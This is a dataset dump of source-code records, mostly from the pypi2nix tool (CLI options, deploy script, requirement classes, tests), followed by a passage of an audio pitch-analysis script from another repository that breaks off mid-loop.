is_flag=True, help=\"Enable tests in generated packages.\"\n)\n@click.option(\n \"-V\",\n \"--python-version\",\n \"python_version_argument\",\n required=False,\n default=\"python3\",\n type=click.Choice(available_python_versions),\n show_default=True,\n help=\"Provide which python version we build for.\",\n)\n@click.option(\n \"-r\",\n \"--requirements\",\n required=False,\n default=[],\n multiple=True,\n type=click.Path(exists=True, file_okay=True, dir_okay=False, resolve_path=True),\n help=\"pip requirements.txt file\",\n)\n@click.option(\n \"--dependency-graph-output\",\n required=False,\n default=None,\n type=click.Path(file_okay=True, dir_okay=False, resolve_path=True),\n help=\"Output dependency graph to this location\",\n)\n@click.option(\n \"--dependency-graph-input\",\n required=False,\n default=None,\n type=FILE_URL,\n help=\"Base dependency tree to consume for pypi2nix\",\n)\n@click.option(\n \"-e\",\n \"--editable\",\n multiple=True,\n required=False,\n default=[],\n type=str,\n help=\"location/url to editable locations\",\n)\n@click.option(\n \"-s\",\n \"--setup-requires\",\n multiple=True,\n required=False,\n default=None,\n type=str,\n help=\"Extra Python dependencies needed before the installation \" \"to build wheels.\",\n)\n@click.option(\n \"-O\",\n \"--overrides\",\n multiple=True,\n required=False,\n type=FILE_URL,\n help=\"Extra expressions that override generated expressions \"\n + \"for specific packages\",\n)\n@click.option(\n \"--default-overrides/--no-default-overrides\",\n default=True,\n help='Apply overrides from \"nixpkgs-python\" (https://github.com/nix-community/pypi2nix-overrides)', # noqa\n)\n@click.option(\n \"-W\",\n \"--wheels-cache\",\n multiple=True,\n required=False,\n default=[],\n type=str,\n help=\"An url where trusted wheels are located. eg. https://travis.garbas.si/wheels-cache\", # noqa\n)\n@click.option(\n \"--build-directory\",\n default=None,\n type=click.Path(exists=True, file_okay=False, dir_okay=True, resolve_path=True),\n help=\" \".join(\n [\n \"WARNING: This option does not work, don't use it.\",\n \"Directory where pypi2nix stores all build artifacts,\",\n \"if not specified a temporary directory will be used\",\n ]\n ),\n)\ndef main(\n version: str,\n verbose: int,\n quiet: int,\n nix_shell: Optional[str],\n nix_path: List[str],\n basename: str,\n extra_build_inputs: List[str],\n emit_extra_build_inputs: bool,\n extra_env: str,\n enable_tests: bool,\n python_version_argument: str,\n requirements: List[str],\n editable: List[str],\n setup_requires: List[str],\n overrides: List[NetworkFile],\n default_overrides: bool,\n wheels_cache: List[str],\n build_directory: Optional[str],\n dependency_graph_output: Optional[str],\n dependency_graph_input: Optional[NetworkFile],\n) -> None:\n overrides_list: List[Overrides] = []\n if version:\n click.echo(pypi2nix_version)\n exit(0)\n verbosity = verbosity_from_int(verbose - quiet + DEFAULT_VERBOSITY)\n nix_executable_directory: Optional[str]\n if nix_shell is None:\n nix_executable_directory = None\n else:\n if not os.path.isfile(nix_shell):\n raise click.exceptions.UsageError(\n f\"Specified `nix-shell` executable `{nix_shell}` does not exist.\"\n )\n else:\n nix_executable_directory = os.path.dirname(os.path.abspath(nix_shell))\n overrides_list += [OverridesNetworkFile(network_file) for network_file in overrides]\n if default_overrides:\n overrides_list += tuple(\n [\n OverridesGithub(\n owner=\"nix-community\",\n repo=\"pypi2nix-overrides\",\n path=\"overrides.nix\",\n )\n ]\n )\n python_version = getattr(PythonVersion, python_version_argument, None)\n if python_version is None:\n raise click.exceptions.UsageError(\n f\"Python version `{python_version_argument}` not available\"\n )\n\n project_directory_context: ProjectDirectory = (\n TemporaryProjectDirectory()\n if build_directory is None\n else PersistentProjectDirectory(path=build_directory)\n )\n if dependency_graph_input:\n dependency_graph = DependencyGraph.deserialize(dependency_graph_input.fetch())\n else:\n dependency_graph = DependencyGraph()\n with project_directory_context as _project_directory:\n configuration = ApplicationConfiguration(\n emit_extra_build_inputs=emit_extra_build_inputs,\n enable_tests=enable_tests,\n extra_build_inputs=args_as_list(extra_build_inputs),\n extra_environment=extra_env,\n nix_executable_directory=nix_executable_directory,\n nix_path=nix_path,\n output_basename=basename,\n overrides=overrides_list,\n python_version=python_version,\n requirement_files=requirements,\n requirements=editable,\n setup_requirements=setup_requires,\n verbosity=verbosity,\n wheels_caches=wheels_cache,\n project_directory=Path(_project_directory),\n target_directory=os.getcwd(),\n dependency_graph_output_location=Path(dependency_graph_output)\n if dependency_graph_output\n else None,\n dependency_graph_input=dependency_graph,\n )\n Pypi2nix(configuration).run()\n\n\nDEFAULT_VERBOSITY = 1\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6537467837333679, "alphanum_fraction": 0.6692506670951843, "avg_line_length": 23.1875, "blob_id": "6be4dfc76eefa565a91a31660ed815c4becae8bb", "content_id": "e324452597f61d25b103e98e62400cf83e573816", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1161, "license_type": "no_license", "max_line_length": 78, "num_lines": 48, "path": "/scripts/deploy_to_pypi.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport argparse\nimport os\nimport shutil\nimport subprocess\n\nfrom pypi2nix.version import pypi2nix_version\n\n\ndef main():\n set_up_environment()\n args = parse_args()\n pypi_name = get_pypi_name_from_args(args)\n remove_old_build_artifacts()\n deploy_to(pypi_name)\n\n\ndef set_up_environment():\n os.putenv(\"SOURCE_DATE_EPOCH\", \"315532800\")\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Deploy pypi2nix to pypi\")\n parser.add_argument(\"--production\", action=\"store_true\", default=False)\n return parser.parse_args()\n\n\ndef get_pypi_name_from_args(args):\n return \"pypi\" if args.production else \"test-pypi\"\n\n\ndef remove_old_build_artifacts():\n shutil.rmtree(\"src/pypi2nix.egg-info\", ignore_errors=True)\n\n\ndef deploy_to(pypi_name):\n subprocess.run([\"python\", \"setup.py\", \"sdist\", \"bdist_wheel\"], check=True)\n distribution_paths = [\n f\"dist/pypi2nix-{pypi2nix_version}.tar.gz\",\n f\"dist/pypi2nix-{pypi2nix_version}-py3-none-any.whl\",\n ]\n subprocess.run(\n [\"twine\", \"upload\", \"-r\", pypi_name] + distribution_paths, check=True\n )\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7073906660079956, "alphanum_fraction": 0.7088989615440369, "avg_line_length": 32.150001525878906, "blob_id": "f32cc3e693369f118dafb307ee2fc255cd00c90b", "content_id": "a33d555c4716bfe43c57389b96ca241fb17e316c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1326, "license_type": "permissive", "max_line_length": 76, "num_lines": 40, "path": "/unittests/test_project_directory.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nimport tempfile\n\nimport pytest\n\nfrom pypi2nix.project_directory import PersistentProjectDirectory\nfrom pypi2nix.project_directory import TemporaryProjectDirectory\n\n\n@pytest.fixture(params=(\"tempfile\", \"persistent\"))\ndef project_directory(request,):\n if request.param == \"tempfile\":\n yield TemporaryProjectDirectory()\n elif request.param == \"persistent\":\n with TemporaryProjectDirectory() as directory:\n yield PersistentProjectDirectory(path=directory)\n\n\ndef test_can_write_to_project_directory(project_directory):\n with project_directory as directory:\n file_path = os.path.join(directory, \"test.txt\")\n with open(file_path, \"w\") as f:\n f.write(\"test\")\n\n\ndef test_tempfile_project_directory_is_deleted_after_exception():\n with pytest.raises(Exception), TemporaryProjectDirectory() as directory:\n path = directory\n raise Exception()\n assert not os.path.exists(path)\n\n\ndef test_persistent_project_directory_is_not_deleted_on_exception():\n with tempfile.TemporaryDirectory() as directory:\n with pytest.raises(Exception), PersistentProjectDirectory(\n path=directory\n ) as _project_dir:\n project_directory = _project_dir\n raise Exception()\n assert os.path.exists(project_directory)\n" }, { "alpha_fraction": 0.5685716867446899, "alphanum_fraction": 0.571509838104248, "avg_line_length": 32.283912658691406, "blob_id": "6b4e0aeb0bbb55548a00070f0929433a97f4298f", "content_id": "87573f5f90ed8c83020fdb2e2c8c0e989e79880f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10551, "license_type": "no_license", "max_line_length": 106, "num_lines": 317, "path": "/src/pypi2nix/requirements.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from abc import ABCMeta\nfrom abc import abstractmethod\nfrom typing import Callable\nfrom typing import List\nfrom typing import Optional\nfrom typing import Set\nfrom typing import Tuple\nfrom urllib.parse import urlparse\n\nfrom attr import attrib\nfrom attr import attrs\nfrom attr import evolve\nfrom packaging.utils import canonicalize_name\n\nfrom pypi2nix.environment_marker import EnvironmentMarker\nfrom pypi2nix.environment_marker import MarkerEvaluationFailed\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package_source import GitSource\nfrom pypi2nix.package_source import HgSource\nfrom pypi2nix.package_source import PackageSource\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.package_source import UrlSource\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass IncompatibleRequirements(Exception):\n pass\n\n\nclass Requirement(metaclass=ABCMeta):\n @abstractmethod\n def name(self) -> str:\n pass\n\n @abstractmethod\n def extras(self) -> Set[str]:\n pass\n\n @abstractmethod\n def add(\n self, other: \"Requirement\", target_platform: TargetPlatform\n ) -> \"Requirement\":\n pass\n\n @abstractmethod\n def source(self) -> Optional[PackageSource]:\n pass\n\n @abstractmethod\n def environment_markers(self) -> Optional[EnvironmentMarker]:\n pass\n\n @abstractmethod\n def logger(self) -> Logger:\n pass\n\n def applies_to_target(\n self, target_platform: TargetPlatform, extras: List[str] = []\n ) -> bool:\n environment_markers = self.environment_markers()\n try:\n return (\n True\n if environment_markers is None\n else environment_markers.applies_to_platform(target_platform, extras)\n )\n except MarkerEvaluationFailed as e:\n self.logger().warning(\n \"Could not evaluate environment marker `{marker}`. Error message was `{message}`\".format(\n marker=environment_markers, message=e.args\n )\n )\n return False\n\n @abstractmethod\n def to_line(self) -> str:\n pass\n\n\n@attrs\nclass UrlRequirement(Requirement):\n _name: str = attrib()\n _url: str = attrib()\n _extras: Set[str] = attrib()\n _environment_markers: Optional[EnvironmentMarker] = attrib()\n _logger: Logger = attrib()\n\n def name(self) -> str:\n return canonicalize_name(self._name)\n\n def extras(self) -> Set[str]:\n return self._extras\n\n def logger(self) -> Logger:\n return self._logger\n\n def add(self, other: Requirement, target_platform: TargetPlatform) -> Requirement:\n if not self.applies_to_target(target_platform):\n return other\n elif not other.applies_to_target(target_platform):\n return self\n elif self.name() != other.name():\n raise IncompatibleRequirements(\n \"Cannot add requirments with different names `{name1}` and `{name2}`\".format(\n name1=self.name(), name2=other.name()\n )\n )\n else:\n if isinstance(other, VersionRequirement):\n return self\n elif isinstance(other, PathRequirement):\n raise IncompatibleRequirements(\n \"Cannot combine requirements with with url `{url}` and path `{path}`\".format(\n url=self.url, path=other.path\n )\n )\n elif isinstance(other, UrlRequirement):\n if self.url != other.url:\n raise IncompatibleRequirements(\n \"Cannot combine requirements with different urls `{url1}` and `{url2}`\".format(\n url1=self.url, url2=other.url\n )\n )\n else:\n return self\n else:\n raise IncompatibleRequirements(\n \"Did not recognize requirement type of {}\".format(other)\n )\n\n def source(self) -> PackageSource:\n if self._url.startswith(\"git+\"):\n return self._handle_git_source(self._url[4:])\n elif self._url.startswith(\"git://\"):\n return self._handle_git_source(self._url)\n elif self._url.startswith(\"hg+\"):\n return self._handle_hg_source(self._url[3:])\n elif self.url_scheme() == \"file\":\n return PathSource(path=self.url_path())\n else:\n return UrlSource(url=self._url, logger=self._logger)\n\n def environment_markers(self) -> Optional[EnvironmentMarker]:\n return self._environment_markers\n\n def _handle_hg_source(self, url: str) -> HgSource:\n try:\n url, rev = url.split(\"@\")\n except ValueError:\n return HgSource(url=url, logger=self._logger)\n else:\n return HgSource(url=url, revision=rev, logger=self._logger)\n\n def _handle_git_source(self, url: str) -> GitSource:\n try:\n url, rev = url.split(\"@\")\n except ValueError:\n return GitSource(url=url)\n else:\n return GitSource(url=url, revision=rev)\n\n def to_line(self) -> str:\n extras = \"[\" + \",\".join(self.extras()) + \"]\" if self.extras() else \"\"\n return \"{url}#egg={name}{extras}\".format(\n url=self._url, name=self.name(), extras=extras\n )\n\n def url(self) -> str:\n return self._url\n\n def url_scheme(self) -> str:\n url = urlparse(self.url())\n return url.scheme\n\n def url_path(self) -> str:\n url = urlparse(self.url())\n return url.path\n\n\n@attrs\nclass PathRequirement(Requirement):\n _name: str = attrib()\n _path: str = attrib()\n _extras: Set[str] = attrib()\n _environment_markers: Optional[EnvironmentMarker] = attrib()\n _logger: Logger = attrib()\n\n def name(self) -> str:\n return canonicalize_name(self._name)\n\n def extras(self) -> Set[str]:\n return self._extras\n\n def logger(self) -> Logger:\n return self._logger\n\n def add(self, other: Requirement, target_platform: TargetPlatform) -> Requirement:\n if not self.applies_to_target(target_platform):\n return other\n elif not other.applies_to_target(target_platform):\n return self\n elif self.name() != other.name():\n raise IncompatibleRequirements(\n \"Cannot add requirements with different names `{name1}` and `{name2}`\".format(\n name1=self.name(), name2=other.name()\n )\n )\n else:\n if isinstance(other, VersionRequirement):\n return self\n elif isinstance(other, UrlRequirement):\n raise IncompatibleRequirements(\n \"Cannot combine requirements with path `{path} and url `{url}`\".format(\n path=self.path, url=other.url\n )\n )\n elif isinstance(other, PathRequirement):\n if self.path != other.path:\n raise IncompatibleRequirements(\n \"Cannot combine requirements with different paths `{path1}` and `{path2}`\".format(\n path1=self.path, path2=other.path\n )\n )\n else:\n return self\n else:\n raise IncompatibleRequirements(\n \"Did not recognize requirement type of {}\".format(other)\n )\n\n def source(self) -> PathSource:\n return PathSource(path=self._path)\n\n def environment_markers(self) -> Optional[EnvironmentMarker]:\n return self._environment_markers\n\n def to_line(self) -> str:\n extras = \"[\" + \",\".join(self.extras()) + \"]\" if self.extras() else \"\"\n return \"file://{path}#egg={name}{extras}\".format(\n path=self._path, extras=extras, name=self.name()\n )\n\n def path(self) -> str:\n return self._path\n\n def change_path(self, mapping: Callable[[str], str]) -> \"PathRequirement\":\n return evolve(self, path=mapping(self._path))\n\n\n@attrs\nclass VersionRequirement(Requirement):\n _name: str = attrib()\n _versions: List[Tuple[str, str]] = attrib()\n _extras: Set[str] = attrib()\n _environment_markers: Optional[EnvironmentMarker] = attrib()\n _logger: Logger = attrib()\n\n def name(self) -> str:\n return canonicalize_name(self._name)\n\n def extras(self) -> Set[str]:\n return self._extras\n\n def logger(self) -> Logger:\n return self._logger\n\n def add(self, other: Requirement, target_platform: TargetPlatform) -> Requirement:\n if not self.applies_to_target(target_platform):\n return other\n elif not other.applies_to_target(target_platform):\n return self\n elif self.name() != other.name():\n raise IncompatibleRequirements(\n \"Cannot add requirments with different names `{name1}` and `{name2}`\".format(\n name1=self.name(), name2=other.name()\n )\n )\n else:\n if isinstance(other, PathRequirement):\n return other\n elif isinstance(other, UrlRequirement):\n return other\n elif isinstance(other, VersionRequirement):\n return VersionRequirement(\n name=self.name(),\n extras=self._extras.union(other._extras),\n versions=self.version() + other.version(),\n environment_markers=None,\n logger=self.logger(),\n )\n else:\n raise IncompatibleRequirements(\n \"Did not recognize requirement type of {}\".format(other)\n )\n\n def source(self) -> None:\n return None\n\n def environment_markers(self) -> Optional[EnvironmentMarker]:\n return self._environment_markers\n\n def version(self) -> List[Tuple[str, str]]:\n return self._versions\n\n def to_line(self) -> str:\n version = \", \".join(\n [\n \"{operator} {specifier}\".format(operator=operator, specifier=specifier)\n for operator, specifier in self._versions\n ]\n )\n extras = (\n \"[{extras}]\".format(extras=\",\".join(self.extras())) if self.extras() else \"\"\n )\n return \"{name}{extras} {version}\".format(\n name=self._name, version=version, extras=extras\n )\n" }, { "alpha_fraction": 0.688829779624939, "alphanum_fraction": 0.688829779624939, "avg_line_length": 30.33333396911621, "blob_id": "486cfb86a66e6f89c293ed0e2541160b5819f43c", "content_id": "918d70604f38b6e499b38f9629c77cba0603eb70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 376, "license_type": "no_license", "max_line_length": 80, "num_lines": 12, "path": "/mypy/packaging/markers.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Dict\nfrom typing import Optional\n\ndef default_environment() -> Dict[str, str]: ...\n\nclass Marker:\n def __init__(self, marker: str) -> None: ...\n def evaluate(self, environment: Optional[Dict[str, str]] = ...) -> bool: ...\n\nclass InvalidMarker(ValueError): ...\nclass UndefinedComparison(ValueError): ...\nclass UndefinedEnvironmentName(ValueError): ...\n" }, { "alpha_fraction": 0.7110884785652161, "alphanum_fraction": 0.7161749601364136, "avg_line_length": 21.86046600341797, "blob_id": "842849243c95e225483b6a485ffbbb73d0382a94", "content_id": "953a0f8289fb325de9f1e4b905d6aff44889a77b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 983, "license_type": "permissive", "max_line_length": 62, "num_lines": 43, "path": "/unittests/test_sources.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.sources import Sources\n\n\n@pytest.fixture\ndef sources():\n return Sources()\n\n\n@pytest.fixture\ndef other_sources():\n return Sources()\n\n\ndef test_sources_can_be_added_to(sources):\n sources.add(\"testsource\", PathSource(\"/test/path\"))\n\n assert \"testsource\" in sources\n\n\ndef test_sources_can_be_queried_by_name(sources):\n source = PathSource(\"/test/path\")\n sources.add(\"testsource\", source)\n\n assert sources[\"testsource\"] is source\n\n\ndef test_sources_can_be_merged(sources, other_sources):\n assert \"testsource\" not in sources\n other_sources.add(\"testsource\", PathSource(\"/test/path\"))\n sources.update(other_sources)\n assert \"testsource\" in sources\n\n\ndef test_items_returns_length_on_tuple_for_one_entry(sources):\n sources.add(\"testitem\", PathSource(\"/test/path\"))\n assert len(sources.items()) == 1\n\n\ndef test_empty_sources_has_length_0(sources):\n assert len(sources) == 0\n" }, { "alpha_fraction": 0.7352941036224365, "alphanum_fraction": 0.7352941036224365, "avg_line_length": 21.66666603088379, "blob_id": "5da7e8e2369be4b8aee1105faf9ba9d43a2b99b9", "content_id": "305d1a56e98588d35097b86b906607e9c0817814", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 136, "license_type": "no_license", "max_line_length": 38, "num_lines": 6, "path": "/integrationtests/test_flit.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass FlitTestCase(IntegrationTest):\n name_of_testcase = \"flit\"\n requirements = [\"flit\"]\n" }, { "alpha_fraction": 0.7052023410797119, "alphanum_fraction": 0.7052023410797119, "avg_line_length": 23.714284896850586, "blob_id": "6625ae080f7e34c0110642e81ed2ad01d4a3b4ca", "content_id": "9487fc8bd6c8abc7d4bcac14acce29cd613b5343", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 173, "license_type": "no_license", "max_line_length": 38, "num_lines": 7, "path": "/integrationtests/test_empy.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass EmpyTestCase(IntegrationTest):\n name_of_testcase = \"empy\"\n code_for_testing = [\"import em\"]\n requirements = [\"empy\"]\n" }, { "alpha_fraction": 0.6495097875595093, "alphanum_fraction": 0.718137264251709, "avg_line_length": 28.14285659790039, "blob_id": "1fec46378a26b00d9937c233e746736afa0b35dc", "content_id": "1c5a720c360bf440baf1da45e3bee47a871c0aad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 408, "license_type": "no_license", "max_line_length": 79, "num_lines": 14, "path": "/integrationtests/test_tornado.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\nREVISION = \"69253c820df473407c562a227d0ba36df25018ab\"\n\n\nclass TornadoTestCase(IntegrationTest):\n name_of_testcase = \"tornado\"\n code_for_testing = [\"import tornado\"]\n requirements = [\n \"-e git+git://github.com/tornadoweb/tornado.git@69253c820df473407c562a227d0ba36df25018ab#egg=tornado\"\n ]\n\n def requirements_file_check(self, content):\n self.assertIn(REVISION, content)\n" } ]
140
thanhtran18/AdaBoost
https://github.com/thanhtran18/AdaBoost
ee35f4db3766fe2cf3605cee5fdc6d418d672ebb
fd543a6a07d52dd0c61fe613f6b21da5538a4c6f
29dc10a2cedef6edf9694a701f7e75fff8a1b430
refs/heads/master
2020-04-30T19:44:24.563290
2019-03-26T15:58:52
2019-03-26T15:58:52
177,047,244
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5903670787811279, "alphanum_fraction": 0.6050970554351807, "avg_line_length": 30.218978881835938, "blob_id": "022f89b4d4437f63ee4981245c09ef393314ce19", "content_id": "a3b248847fa4bffdd9a3681456e3e70526511b3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4277, "license_type": "no_license", "max_line_length": 105, "num_lines": 137, "path": "/utils.py", "repo_name": "thanhtran18/AdaBoost", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.io import *\nimport matplotlib.pyplot as plt\n\n\ndef findWeakLearner(X, t, weights):\n # Fine the best weaker learner given data, targets, and weights.\n # weakl learner is a decision stump, p x(d) > p theta\n #\n # X is n-by-m-by-N\n # t is N-by-1\n # weight is N-by-1\n # d is 1-by-2 (index into 2-D matrix)\n # p is +/- 1\n # theta is scale\n # correct is N-by-1, binary. correct[i]=1 iff this weak learner correctly classifies example X[:,:,i]\n\n N = X.shape[2]\n\n t = np.squeeze(t)\n weights = np.squeeze(weights)\n\n # Sort all coordinates of X\n sinds = np.argsort(X) # sort based on last column\n Xs = np.sort(X)\n\n # Sort target vales according to this data sort\n Ts = t[sinds]\n\n # Sort weight values according to this data sort\n Ws = weights[sinds]\n\n # Compute cumsum to evalute goodness of possible thresholds theta.\n # cweight_pos[i,j,k] is amount of correct - incorrect weight incurred on left\n # side of threshold at (Xs[i,j,k]+Xs[i,j,k+1])/2\n cweight_pos = np.cumsum(Ts * Ws, 2)\n\n # Do same in reverse (total -)\n # cwiehgt_neg[i,j,k] is amount of correct - incorrect weight incurred on right\n # side of threshold at (Xs[i,j,k]+Xs[i,j,k+1])/2\n cweight_neg = np.expand_dims(cweight_pos[:, :, -1], 2) - cweight_pos\n\n # Max of either +1/1 times sum of two.\n signed_cor = cweight_pos - cweight_neg\n # Locations where Xs[i,j,k]==Xs[i,j,k+1] are not valid as possible threshold locations\n # Set these to zero so that we do not find thme as maxima\n valid = (np.diff(Xs, 1, 2) != 0)\n signed_cor = signed_cor * np.concatenate((valid, np.zeros((X.shape[0], X.shape[1], 1))), 2)\n\n us_cor = np.abs(signed_cor)\n\n i, j, k = np.unravel_index(np.argmax(us_cor), signed_cor.shape)\n\n # Compute theta, check boundary cayse\n if k == N - 1:\n theta = np.inf\n else:\n theta = (Xs[i, j, k] + Xs[i, j, k + 1]) / 2\n\n # The feature is i,j\n d = [i, j]\n\n # Check whether it was a +max or |-max| to get partity p\n p = -np.sign(signed_cor[i, j, k])\n\n # Whether or not this weak learner classifies examples correctly\n tmp = p * X[i, j, :] > p * theta\n correct = (t * (tmp - 0.5)) > 0\n\n return d, p, theta, correct\n\n\ndef evaluateClassifier(classifier, x, t):\n # Evaluate classifer on data\n #\n # classifier is a map of alpha,d,p,theta arrays of length M\n # x is n-by-m-by-N, data\n # t is N-by-1, ground truth\n # errs is vector of length M\n #\n # errs[i] is error of classifier using first i components of committee in classifier\n\n M = len(classifier['alpha'])\n N = x.shape[2]\n\n # Responses f inputs to each classifier in committee\n resps = np.zeros((N, M))\n for m in range(M):\n x_use = x[classifier['d'][m, 0], classifier['d'][m, 1], :]\n resps[:, m] = classifier['alpha'][m] * np.sign(\n (classifier['p'][m] * x_use > classifier['p'][m] * classifier['theta'][m]) - 0.5)\n\n # Compute output of classifier using first i components using cumsum\n class_out = np.sign(np.cumsum(resps, 1))\n\n # Compare classifier output to ground-truth t\n correct = (class_out * np.reshape(t, (N, 1))) > 0\n\n errs = 1 - np.mean(correct, 0)\n\n return errs\n\n\ndef visualizeClassifier(classifier, fig_num, im_size):\n # Visualize a classifier\n # Color negative and positive pixels by sum of alpha values\n\n pos_feat = np.zeros(im_size)\n neg_feat = np.zeros(im_size)\n for m in range(len(classifier['alpha'])):\n if classifier['p'][m] > 0:\n pos_feat[classifier['d'][m, 0], classifier['d'][m, 1]] += classifier['alpha'][m]\n else:\n neg_feat[classifier['d'][m, 0], classifier['d'][m, 1]] += classifier['alpha'][m]\n\n plt.figure(fig_num)\n plt.subplot(121)\n plt.imshow(pos_feat, cmap='gray')\n plt.title('Sum of weights on p=1 features')\n\n plt.subplot(122)\n plt.imshow(neg_feat, cmap='gray')\n plt.title('Sum of weights on p=-1 features')\n plt.show()\n\n\nif __name__ == \"__main__\":\n N = 5\n X = np.random.random((10, 20, N))\n t = np.random.random((N, 1))\n weights = np.random.random((N, 1))\n\n d, p, theta, correct = findWeakLearner(X, t, weights)\n print(d)\n print(p)\n print(theta)\n print(correct)\n" }, { "alpha_fraction": 0.6021955013275146, "alphanum_fraction": 0.63774174451828, "avg_line_length": 23.5256404876709, "blob_id": "430d37a3dcdcff38e9ebc8b762ef7521915513b8", "content_id": "0cebfe2ce3ada18d429f2b32ed771056f2d9351b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1913, "license_type": "no_license", "max_line_length": 100, "num_lines": 78, "path": "/boost_digits.py", "repo_name": "thanhtran18/AdaBoost", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.io import *\nimport matplotlib.pyplot as plt\nfrom utils import *\n\n# boosting for recognizing MNIST digits\n\n# Load the data X and labels t\ndata = loadmat('digits.mat')\nX, t = data['X'], data['t']\nt = t.astype(int)\n\n# X is 28x28x1000, t is 1000x1\n# Each X[:,:,i] os a 28x28 image\n\n# Subsample images to be 14x14 for speed\nX = X[::2, ::2, :]\n\n# Set up target values\n# 4s are class +1, all others are class -1\nf4 = (t == 4)\nn4 = (t != 4)\nt[f4] = 1\nt[n4] = -1\n\n# 14,14,1000\nnx, ny, ndata = X.shape\n\n# Number to use as training images\nntrain = 500\n\n# Training and test images\nX_train = X[:, :, :ntrain]\nt_train = t[:ntrain]\nX_test = X[:, :, ntrain:]\nt_test = t[ntrain:]\n\n# Boosting code goes here\nniter = 100\n\n# Initialize the weights\nweights = np.ones((1, ntrain)) / ntrain\nclassifier = {'alpha': np.zeros(niter), 'd': np.zeros((niter, 2)).astype(int), 'p': np.zeros(niter),\n 'theta': np.zeros(niter)}\n\nfor iter in range(niter):\n # Find the best weak learner\n d, p, theta, correct = findWeakLearner(X_train, t_train, weights)\n\n # alpha = 0\n err = weights @ (1 - correct) / weights.sum()\n if err > 0.5:\n break\n # alpha = 0\n alpha = np.log((1 - err) / (err + np.spacing(1)))\n\n weights = weights * np.exp(alpha.reshape(1, 1) @ (1 - correct).reshape(1, 500))\n weights = weights/weights.sum()\n\n classifier['alpha'][iter] = alpha\n classifier['d'][iter, :] = d\n classifier['p'][iter] = p\n classifier['theta'][iter] = theta\n\n# Show plots of training error and test error\n\ntrain_errs = evaluateClassifier(classifier, X_train, t_train)\ntest_errs = evaluateClassifier(classifier, X_test, t_test)\n\nplt.figure(1)\nplt.rcParams['font.size'] = 20\nplt.plot(train_errs, 'r-')\nplt.plot(test_errs, 'b-')\nplt.xlabel('Number of iterations')\nplt.ylabel('Error')\nplt.legend(['Training error', 'Test error'])\n\nvisualizeClassifier(classifier, 2, (nx, ny))\n" } ]
2
yxc0103de/spektralmagi
https://github.com/yxc0103de/spektralmagi
ded4696eed3a0455ca71de17b500dda05d9c4299
a538d17c9c4da1232002cc7a1718fe5415aee50b
6afdf1769f8e898c500cfc49da089ae387cad2e2
refs/heads/master
2022-05-28T19:09:45.627318
2020-05-03T09:55:35
2020-05-03T09:55:35
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.570684552192688, "alphanum_fraction": 0.6104910969734192, "avg_line_length": 21.214876174926758, "blob_id": "a7a733c4ee7faac8ff8d28d61839385307045d88", "content_id": "1120cc40b4571525efde5b76f12160ebb3a33329", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2688, "license_type": "no_license", "max_line_length": 102, "num_lines": 121, "path": "/erik/test2.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport pyaudio\nimport struct\nimport numpy as np\nimport pysptk.sptk as sptk\nimport time\nfrom datetime import datetime\n\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nRATE = 48000\nCHUNK = 13000 #int(wlen*RATE) 13000\nwlen = float(CHUNK/RATE)\n\np = pyaudio.PyAudio()\n\nchosen_device_index = -1\nfor x in range(0,p.get_device_count()):\n info = p.get_device_info_by_index(x)\n print(p.get_device_info_by_index(x))\n if info[\"name\"] == 'Built-in Microphone':\n chosen_device_index = info[\"index\"]\n print(\"Chosen index: \", chosen_device_index)\n\nstream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input_device_index=chosen_device_index,\n input=True,\n output=True,\n frames_per_buffer=CHUNK\n )\n\n\n# data = stream.read(CHUNK)\n# data_int16 = struct.unpack(str(CHUNK) + 'h', data)\n\n# draw the figure so the animations will work\nfig = plt.gcf()\nfig.show()\nfig.canvas.draw()\n\nt = np.linspace(-10,0,num=10*RATE)\nsound = np.zeros(10*RATE)\ndt = int(wlen/10*RATE)\npitch = np.zeros(int(10/dt*RATE))\ntp = np.linspace(-10,0,num=len(pitch))\n\nprint(\"Start loop\")\n#time.sleep(2)\n\n\nwhile True:\n\n # compute something\n t0 = time.process_time()\n data = np.array(struct.unpack(str(CHUNK) + 'h', stream.read(CHUNK,exception_on_overflow = False)))\n t1 = time.process_time()\n # 